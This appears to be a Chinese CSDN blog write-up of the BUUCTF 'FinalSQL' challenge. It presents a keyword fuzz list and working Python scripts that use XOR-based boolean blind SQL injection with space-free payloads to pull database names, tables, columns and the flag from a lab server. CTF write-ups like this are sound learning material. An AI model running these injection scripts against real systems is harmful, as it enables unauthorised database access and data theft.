[极客大挑战 2019]FinalSQL(bypass盲注)

最新推荐文章于 2024-03-16 07:00:00 发布
最新推荐文章于 2024-03-16 07:00:00 发布
阅读量729 收藏 1
点赞数
分类专栏: # web 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56313338/article/details/132643691
版权

在这里插入图片描述
这里是数字型注入,选择一个序号

fuzz

?id=1

这里过滤了很多东西
使用fuzzSQL字典,这是我自己定义编写的一个fuzz字典,内容较少

select
from
information
.
tables
where
=
'
and
"
or
|
&
union
columns
updatexml
extractvalue
database
table_name
column_name
schema_name
--
%25
like
||
&&
<
>
(
)
group_concat
database
OR
1%0A1
1%091
1%0C1
1%0D1
1%201
*
/
-
^
if
`
substr
mid
ascii
limit
ord
,
from
for
offset
in
length
concat

使用bp加载字典进行测试

在这里插入图片描述
看出被拦截的关键字相应大小为890,那么之外的就是没有被拦截的

空格被过滤了,这里使用 ^ 来计算是否为数字注入

?id=1^1
?id=1^0
?id=0^1

通过测试可以发现,除了第一个其他都执行成功,也就是说是数字型注入

在这里插入图片描述

也就是可以通过布尔注入来测试

?id=0^(测试语句)

如果测试语句为真那么整体返回真

那么我们的思路如下

  • 得到所有数据库
  • 查询指定数据库的数据表
  • 查询数据表的所有字段

使用python脚本编写,如果响应为429那么就是请求过快需要等待一会再进行请求

获取所有数据库

import requests
from time import sleep
url = "http://dd9a70f3-f3ef-42bd-8286-fe0bdccac825.node4.buuoj.cn:81/search.php?id=0^({})"
# 如果为真时的关键字匹配
base = 'Click others'
# 盲注的字符集
chars = ',abcdefghijklmnopqrstuvwxyz_ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'

inject = "ord(substr((SELECT(GROUP_CONCAT(schema_name))FROM(information_schema.schemata)),{},1))={}"
for i in range(1, 1000):
    continue_ = False
    for c in chars:
        u = url.format(inject.format(i,ord(c)))
        res = requests.get(u)
        while res.status_code == 429:
            sleep(1)
            res = requests.get(u)
        if base in res.text:
            print(c,end='',flush=True)
            continue_ = True
            break
    if not continue_:
        break

information_schema,mysql,performance_schema,test,geek

获取表

inject = "ord(substr((SELECT(GROUP_CONCAT(table_name))FROM(information_schema.tables)WHERE(table_schema='geek')),{},1))={}"
for i in range(1, 1000):
    continue_ = False
    for c in chars:
        u = url.format(inject.format(i,ord(c)))
        res = requests.get(u)
        while res.status_code == 429:
            sleep(1)
            res = requests.get(u)
        if base in res.text:
            print(c,end='',flush=True)
            continue_ = True
            break
    if not continue_:
        break


F1naI1y,Flaaaaag

获取列

inject = "ord(substr((SELECT(GROUP_CONCAT(column_name))FROM(information_schema.columns)WHERE(table_name='F1naI1y')),{},1))={}"
for i in range(1, 1000):
    continue_ = False
    for c in chars:
        u = url.format(inject.format(i,ord(c)))
        res = requests.get(u)
        while res.status_code == 429:
            sleep(1)
            res = requests.get(u)
        if base in res.text:
            print(c,end='',flush=True)
            continue_ = True
            break
    if not continue_:
        break

id,username,password

获取flag

import requests
import string
from time import sleep
url = "http://9da9cb18-3096-413a-9476-8a177ffec31a.node4.buuoj.cn:81/search.php?id=0^({})"
# 如果为真时的关键字匹配
base = 'Click others'
# 盲注的字符集
chars = string.printable

inject = "ord(substr(reverse((SELECT(GROUP_CONCAT(password))FROM(geek.F1naI1y))),{},1))={}"
for i in range(1, 1000):
    continue_ = False
    for c in chars:
        u = url.format(inject.format(i,ord(c)))
        res = requests.get(u)
        while res.status_code == 429:
            sleep(1)
            res = requests.get(u)
        if base in res.text:
            print(c,end='',flush=True)
            continue_ = True
            break
    if not continue_:
        break

这里使用 reverse 是因为flag在最后面,将得到的结果反转即可得到flag

}42e24a1d9455-24bb-fac4-fdf9-e863df96{galf
flag{69fd368e-9fdf-4caf-bb42-5549d1a42e24}
bug小空
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF [极客挑战 2019]FinalSQL
qq_60829702的博客
10-21 1290
因为之前的几道盲注题目我都是直接看师傅的wp拿来用的,现在自己写一下发现果然光看不如去写。只有自己真正的去写了脚本才会发现一些东西永远都是看起来简单的一批,但是真正的让自己独立写出来还是有点难度的。毕竟那是别人的东西不是自己的东西,我们要把其他师傅的知识变成我们自己的。本人菜鸟一枚,虽然花了挺多时间写这个题目和wp的,但是收获到了很多东西,也希望我能坚持下来。
[极客挑战 2019]FinalSQL
wp568的博客
08-26 373
一、题目分析登录框测试,发现各种测试都是一样的反应。随机看了一下,几个紫色数字,点了后有回显。数字输入’后,报错,判断从这里开始注入测试。1、页面没有数据库报错回显,且union被过滤,无法采用联合查询。2、页面爆出的错误非数据库原始错误,无法使用报错注入。3、时间盲注耗费时间,非必要一般不使用。sql异或注入,经过尝试发现^符号未被过滤,(1^2=3)首先可以根据1^0=1 1^1=0 来判断闭合方式(数字型还是字符型)。因为如果是字符型,不会执行^。简单判断是数字型。二、解题。
[极客挑战 2019]FinalSQL ---不会编程的崽
不会编程的崽的博客
03-16 678
sql盲注
[极客挑战 2019]FinalSQL wp
{OvEr}的博客
11-19 414
[极客挑战 2019]FinalSQL wp 终极sql注入了,考点是盲注(写脚本的那种இ௰இ) 打开网页是这样的。 那个红色的卡片,我们随便点进去看看,直接点最后一个吧。 通过url判断注入点是id。 接着做FUZZ测试,发现同样过滤了union、or、and、||、&等我们常用的关键字,但是没有过滤异或符号^。 当我们输入id=1^1时,回显"Error" 当我们输入id=1^0时,回显正常 接下来我们进行盲注,下面是大神的脚本 step 1爆数据库 import requests u
12306Bypass.zip
04-02
标题中的“12306Bypass.zip”表明这是一个与12306网站相关的程序或工具,可能是为了绕过某些限制或者优化购票体验而设计的。12306是中国铁路客户服务中心的官方网站,主要用于火车票的查询、预订和购买。在节假日或...
bypass_bypass_
09-29
適用於近期之xccode之過渡偵測方式之檔案
bypass功能介绍
06-24
一个关于bypass 和投胎登陆盲注的文档
sqli-bypass靶场
11-10
"sqli-bypass靶场"显然是一个专门用于测试和学习SQL注入漏洞绕过技术的平台。在这个靶场中,你可能会遇到各种防御机制,如输入过滤、参数化查询、存储过程等,而你需要学习如何在这些防御下找到漏洞并实施有效的SQL...
Bypass抢票应用程序
最新发布
03-18
标题中的“Bypass抢票应用程序”指的是一个可能用于绕过常规购票系统限制的软件工具,这类工具在春节期间或热门活动时特别受欢迎,因为它们能够帮助用户自动监控和快速购买稀缺的票务资源。抢票应用通常利用自动化...
[极客挑战 2019]FinalSQL
zzqzzq11的博客
12-03 503
⽤之前的脚本,注意request库的get请求⽤的是param作为参数传递,⽽post⽤的是data。使⽤geek数据库获取表名,修改代码为:sql =使⽤F1nal1y表获取列名:sql =
[极客挑战 2019]FinalSQL - 异或盲注
oZuoShen123的博客
10-05 479
1、这题的关键是找注入点,如果选择用户名、密码作为输入点就麻烦了 2、注入点:按钮,点击就传id;当id=1时,提示Click others   可以利用id的特性,构造异或匹配   payload: f"1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{j},1))={i})^1"   payload有两个异或:1^表达式^1
BUUCTF-[极客挑战 2019]FinalSQL
weixin_44016181的博客
09-15 372
除了普通的注入流程,报错注入,时间注入外,这题涉及了布尔注入当中的异或注入,根据回显的状态信息来获取数据库的相关信息。这样即便是我们不能直接调用和查看数据库,也能通过这种特别的注入方式得到flag。
盲注脚本爆数据库之[极客挑战 2019]FinalSQL
qq_58970968的博客
08-11 444
当过滤的东西很多很多的时候,可以考虑盲注,用 ^ 来判断是否可以进行脚本注入;使用二分法查找数据库的每一个字母;到时候只需要改回显的关键字和url就行。
SQL注入之——[极客挑战 2019]FinalSQL
qq_35015835的博客
11-22 483
[极客挑战 2019]FinalSQL 界面和之前发生一些变化。 采用和上一题一样的方式,判断在输入框中主要过滤了一些什么内容。 从结果中可以看出,在上一题的基础上又增加了一些符号的过滤,如上图彩色部分举例显示,这样造成的结果是,输入框部分不能进行一系列的注入操作,因为关键的字符全部都被过滤。 那么转向这个页面中和上一题不同的地方,就是那几个紫色的方块。 点击之后发现,在URL中有了参数值,那么这样初步将注入目标锁定在GET参数中。 对get字段是否过滤了字段进行检测。 上图中显示的蓝色部分就是被过
bypass和非bypass区别
05-18
Bypass和非Bypass是指计算机网络中的两种不同路由方式。 Bypass是一种路由方式,也称为直通式路由。当网络设备(如防火墙、负载均衡器等)出现故障或维护时,通过Bypass可以让网络流量直接绕过这些设备,而不会造成...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值